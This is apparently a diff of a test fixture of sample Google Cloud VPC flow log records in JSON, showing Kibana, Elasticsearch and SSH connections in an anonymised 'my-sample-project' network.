-{"insertId":"14iipwlfd8t01j","jsonPayload":{"bytes_sent":"1781","connection":{"dest_ip":"192.0.2.117","dest_port":51950,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:41:50.757658840Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:41:50.645030007Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} -{"insertId":"14iipwlfd8t01o","jsonPayload":{"bytes_sent":"361966","connection":{"dest_ip":"203.0.113.134","dest_port":33876,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:37.933154111Z","packets_sent":"80","reporter":"SRC","rtt_msec":"34","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.466868771Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} -{"insertId":"14iipwlfd8t01p","jsonPayload":{"bytes_sent":"1457","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"192.0.2.117","src_port":51950},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:41:50.757658840Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:41:50.645030007Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} -{"insertId":"14iipwlfd8t01e","jsonPayload":{"bytes_sent":"1781","connection":{"dest_ip":"192.0.2.117","dest_port":58658,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:49:50.856250208Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:49:50.733935895Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} -{"insertId":"14iipwlfd8t01q","jsonPayload":{"bytes_sent":"1467","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"203.0.113.12","src_port":59924},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:41:08.213471928Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:41:08.092659117Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} -{"insertId":"14iipwlfd8t01i","jsonPayload":{"bytes_sent":"1461","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"192.0.2.117","src_port":58658},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:50.856250208Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:49:50.733935895Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} -{"insertId":"14iipwlfd8t01k","jsonPayload":{"bytes_sent":"123732","connection":{"dest_ip":"203.0.113.58","dest_port":65272,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.316981133Z","packets_sent":"618","reporter":"SRC","rtt_msec":"123","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.403442252Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} -{"insertId":"14iipwlfd8t01f","jsonPayload":{"bytes_sent":"76342","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.58","src_port":65273},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.316930467Z","packets_sent":"710","reporter":"DEST","rtt_msec":"115","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:40:00.155378287Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} -{"insertId":"14iipwlfd8t018","jsonPayload":{"bytes_sent":"9761","connection":{"dest_ip":"192.0.2.73","dest_port":45224,"protocol":6,"src_ip":"10.73.186.17","src_port":22},"dest_location":{"asn":4847,"city":"Beijing","continent":"Asia","country":"chn","region":"Beijing"},"end_time":"2019-06-14T03:44:23.955039461Z","packets_sent":"13","reporter":"SRC","rtt_msec":"242","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"infraops-docker-data","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:42:23.705320616Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} -{"insertId":"14iipwlfd8t01a","jsonPayload":{"bytes_sent":"1467","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"198.51.100.107","src_port":56410},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:47:10.630345069Z","packets_sent":"7","reporter":"DEST","rtt_msec":"37","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:47:10.514594429Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} -{"insertId":"14iipwlfd8t017","jsonPayload":{"bytes_sent":"51612","connection":{"dest_ip":"203.0.113.58","dest_port":65277,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.316890309Z","packets_sent":"615","reporter":"SRC","rtt_msec":"95","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.760385211Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} -{"insertId":"14iipwlfd8t01m","jsonPayload":{"bytes_sent":"74330","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.58","src_port":65272},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.316981133Z","packets_sent":"745","reporter":"DEST","rtt_msec":"123","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:39:59.403442252Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} -{"insertId":"14iipwlfd8t015","jsonPayload":{"bytes_sent":"1784","connection":{"dest_ip":"203.0.113.12","dest_port":59924,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:41:08.213471928Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:41:08.092659117Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} -{"insertId":"14iipwlfd8t01h","jsonPayload":{"bytes_sent":"76622","connection":{"dest_ip":"203.0.113.58","dest_port":65273,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.316930467Z","packets_sent":"599","reporter":"SRC","rtt_msec":"115","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.155378287Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} -{"insertId":"14iipwlfd8t019","jsonPayload":{"bytes_sent":"42","connection":{"dest_ip":"10.73.186.17","dest_port":22,"protocol":6,"src_ip":"192.0.2.73","src_port":45224},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"infraops-docker-data","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:42:24.922448897Z","packets_sent":"5","reporter":"DEST","rtt_msec":"242","src_location":{"asn":4847,"city":"Beijing","continent":"Asia","country":"chn","region":"Beijing"},"start_time":"2019-06-14T03:42:23.705320616Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} -{"insertId":"14iipwlfd8t016","jsonPayload":{"bytes_sent":"75263","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.58","src_port":65277},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.316890309Z","packets_sent":"729","reporter":"DEST","rtt_msec":"95","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:40:00.760385211Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} -{"insertId":"14iipwlfd8t01c","jsonPayload":{"bytes_sent":"1780","connection":{"dest_ip":"198.51.100.107","dest_port":34646,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:48:10.529592195Z","packets_sent":"7","reporter":"SRC","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:48:10.413494375Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} -{"insertId":"14iipwlfd8t01d","jsonPayload":{"bytes_sent":"1467","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"198.51.100.107","src_port":34646},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:48:10.529541195Z","packets_sent":"7","reporter":"DEST","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:48:10.413397239Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} -{"insertId":"14iipwlfd8t01g","jsonPayload":{"bytes_sent":"5044","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33876},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:37.933154111Z","packets_sent":"87","reporter":"DEST","rtt_msec":"34","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.466868771Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} -{"insertId":"14iipwlfd8t01l","jsonPayload":{"bytes_sent":"14132","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33574},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821056075Z","packets_sent":"91","reporter":"DEST","rtt_msec":"509","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.468484109Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} -{"insertId":"14iipwlfd8t01b","jsonPayload":{"bytes_sent":"151213","connection":{"dest_ip":"203.0.113.134","dest_port":33574,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821129119Z","packets_sent":"68","reporter":"SRC","rtt_msec":"509","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.468484109Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} +{"insertId":"ut8lbrffooxyw","jsonPayload":{"bytes_sent":"1776","connection":{"dest_ip":"67.43.156.13","dest_port":33478,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:45:37.301953198Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:45:37.186193305Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} +{"insertId":"ut8lbrffooxzb","jsonPayload":{"bytes_sent":"173663","connection":{"dest_ip":"10.87.40.76","dest_port":33970,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821302149Z","packets_sent":"68","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.466657665Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} +{"insertId":"ut8lbrffooxze","jsonPayload":{"bytes_sent":"155707","connection":{"dest_ip":"67.43.156.13","dest_port":33576,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821143836Z","packets_sent":"78","reporter":"SRC","rtt_msec":"201","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:20.510622432Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} +{"insertId":"ut8lbrffooxyz","jsonPayload":{"bytes_sent":"0","connection":{"dest_ip":"192.168.2.23","dest_port":59679,"protocol":6,"src_ip":"10.139.99.242","src_port":22},"dest_location":{"asn":49505,"city":"Saint Petersburg","continent":"Europe","country":"rus","region":"Saint Petersburg"},"end_time":"2019-06-14T03:40:46.031032701Z","packets_sent":"1","reporter":"SRC","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:45.860349247Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} +{"insertId":"ut8lbrffooxz6","jsonPayload":{"bytes_sent":"1784","connection":{"dest_ip":"192.168.2.117","dest_port":50646,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:40:37.048196137Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:36.895188084Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} +{"insertId":"ut8lbrffooxzf","jsonPayload":{"bytes_sent":"1464","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"192.168.2.117","src_port":50646},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:40:37.048196137Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:40:36.895188084Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} +{"insertId":"ut8lbrffooxz1","jsonPayload":{"bytes_sent":"186151","connection":{"dest_ip":"10.87.40.76","dest_port":33692,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565287007Z","packets_sent":"251","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.500498059Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} +{"insertId":"ut8lbrffooxyp","jsonPayload":{"bytes_sent":"15169","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33880},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821308944Z","packets_sent":"92","reporter":"SRC","rtt_msec":"3","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.469099728Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} +{"insertId":"ut8lbrffooxzd","jsonPayload":{"bytes_sent":"250864","connection":{"dest_ip":"10.87.40.76","dest_port":33554,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565311154Z","packets_sent":"247","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.500506974Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} 